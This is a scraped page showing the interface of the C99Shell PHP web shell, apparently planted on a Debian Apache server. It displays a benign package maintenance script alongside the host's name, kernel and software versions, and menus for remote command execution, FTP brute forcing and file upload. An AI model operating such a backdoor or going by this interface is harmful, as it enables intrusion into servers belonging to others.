!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/wwwconfig-common/   drwxr-xr-x
Free 130.05 GB of 142.11 GB (91.51%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     apache-include-postrm.sh (1.8 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/bin/sh
# File:         apache-include-postrm.sh
# Changes:
#       20020228 Mark Eichin <eichin@thok.org> Initial version, based
#               on extensive cut&paste from other apache*.sh scripts.
#
# Needs:        $servers - which server to be cleaned up (anything 
#               recognized by apache-*include*.sh
#               $includefile - what file that should be cleaned up.
# Description:  Uses debian postrm arguments to choose to uninclude or 
#               cominclude the file in $includefile.
# Sets:         $restart gets any servers that need restarting 
#               added to it, for later use by restart.sh.  Also
#               sets or passes through $error.

if [ -z "$servers" ] ; then
#    error="No server list specified for apache-include-postrm.sh."
# actually, no servers just means no work for us, not an error.
    :
elif [ -z "$includefile" ] ; then
    error="No include file specified in apache-include-postrm.sh."
else
    status=nothing
    log="${log}Running postrm $1 scripts for $servers servers."
    for server in $servers; do
        case "$1" in
            purge)
                log="${log}using uninclude to purge $server."
                . /usr/share/wwwconfig-common/apache-uninclude_all.sh
                if [ "$status" = "purge" ] ; then
                    restart="$restart $server"
                    status=nothing # we already "consumed" the status
                fi
                ;;
            remove)
                log="${log}using cominclude to remove $server."
                . /usr/share/wwwconfig-common/apache-cominclude_all.sh
                if [ "$status" = "comment" ] ; then
                    restart="$restart $server"
                    status=nothing # we already "consumed" the status
                fi
                ;;
        esac
    done
fi

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.012 ]--